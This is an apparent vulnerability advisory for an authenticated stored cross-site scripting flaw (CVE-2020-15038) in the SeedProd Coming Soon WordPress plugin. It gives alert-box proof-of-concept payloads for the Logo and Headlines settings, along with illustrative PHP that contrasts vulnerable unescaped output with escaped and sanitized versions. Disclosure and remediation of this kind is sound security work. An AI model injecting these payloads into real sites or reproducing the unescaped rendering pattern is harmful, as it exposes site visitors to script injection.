Coming Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2 - Authenticated Stored Cross Site Scripting (XSS)



Description
Authenticated stored cross-site scripting issues in some of the plugin settings, requiring high privileges.
Proof of Concept
Affected fields are in the settings of the plugin; the payload is triggered when the coming soon page is displayed (either the preview or the normal one):

Logo: x' onerror='alert(/XSS/)
Headlines: <script>alert(/XSS/)</script> (for v < 5.1.1), <img src=x onerror=alert(/XSS/)/> (for v < 5.1.2)
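The rendering pattern behind this class of bug, shown as an added illustration that is not the plugin's own code: a setting saved by a high-privilege user is later echoed into the coming soon page. The vulnerable form writes the raw option straight into an attribute and into markup; the hardened form escapes for each output context and sanitizes on save. Option names, function names and the template shape are assumptions.

```php
<?php
// Added illustration (not SeedProd's code). Option and function names are assumed.
// A Logo value such as  x' onerror='alert(/XSS/)  closes a single-quoted src
// attribute and adds an event handler; a Headline value containing <script> or
// <img onerror=...> is parsed as markup when echoed unescaped.

// Vulnerable rendering: raw option values interpolated into HTML.
function example_render_vulnerable() {
    $logo     = get_option( 'example_logo', '' );
    $headline = get_option( 'example_headline', '' );
    echo "<img src='" . $logo . "' alt='logo'>"; // attribute context, unescaped
    echo "<h1>" . $headline . "</h1>";           // HTML text context, unescaped
}

// Hardened rendering: escape for the exact context the value lands in.
function example_render_safe() {
    $logo     = get_option( 'example_logo', '' );
    $headline = get_option( 'example_headline', '' );
    // esc_url() strips characters that are invalid in a URL (including spaces),
    // drops disallowed schemes and encodes the quote as &#039;, so the payload
    // can no longer terminate the attribute.
    echo "<img src='" . esc_url( $logo ) . "' alt='logo'>";
    // esc_html() converts & < > " ' to entities, so injected tags render as text.
    echo '<h1>' . esc_html( $headline ) . '</h1>';
}

// Defence in depth: sanitize on save as well, so a payload never reaches the
// database. esc_url_raw() is the storage variant of esc_url();
// sanitize_text_field() strips tags and control characters.
function example_save_settings( $logo_input, $headline_input ) {
    update_option( 'example_logo', esc_url_raw( $logo_input ) );
    update_option( 'example_headline', sanitize_text_field( $headline_input ) );
}
```

Output escaping is the fix that matters here because the values are already in the database for existing installs; sanitizing on save alone would leave previously stored payloads live.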

Affects Plugin

References

CVE 2020-15038
URL https://www.getastra.com/blog/911/plugin-exploit/stored-xss-coming-soon-page-maintenance-mode-plugin/
URL https://www.jinsonvarghese.com/stored-xss-coming-soon-maintenance-mode-wordpress-plugin/
URL https://wordpress.org/plugins/coming-soon/#developers

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Jinson Varghese Behanan
Submitter Jinson Varghese Behanan
Submitter Website https://www.jinsonvarghese.com
Submitter Twitter JinsonCyberSec
Verified Yes
WPVDB ID 10283

Timeline

Publicly Published 2020-06-25
Added 2020-06-25
Last Updated 2020-06-26
